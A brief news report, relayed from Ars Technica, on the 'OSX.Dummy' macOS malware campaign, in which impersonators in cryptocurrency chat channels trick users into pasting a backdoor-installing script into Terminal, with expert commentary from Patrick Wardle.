Arstechnica: New cyber threat to the Macs users, that exploits the cryptocurrencies as a lure and is “dummy”
New cyber threat to the Macs users, that exploits the cryptocurrencies as a lure and is “dummy”. Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social media platforms has been attempting to lure others into installing macOS malware. It has been reported by Arstechnica. “The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs – is written in an article -. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker”.
The cyber security and malware experts: It’s dubbed “OSX.Dummy”. At the moment the attacker’s intent is not yet clear
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it “OSX.Dummy” because, as he wrote: the infection method is dumb; the massive size of the binary is dumb; the persistence mechanism is lame (and thus also dumb); the capabilities are rather limited (and thus rather dumb); it’s trivial to detect at every step (that dumb), and finally, the malware saves the user’s password to dumpdummy. The cyber attack was first noted by Remco Verhoef of SANS. For Arstechnica the attacker’s intent is not yet clear. But because all of this executes through a Terminal window, it bypasses MacOS’s GateKeeper malware protection, despite being unsigned code. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.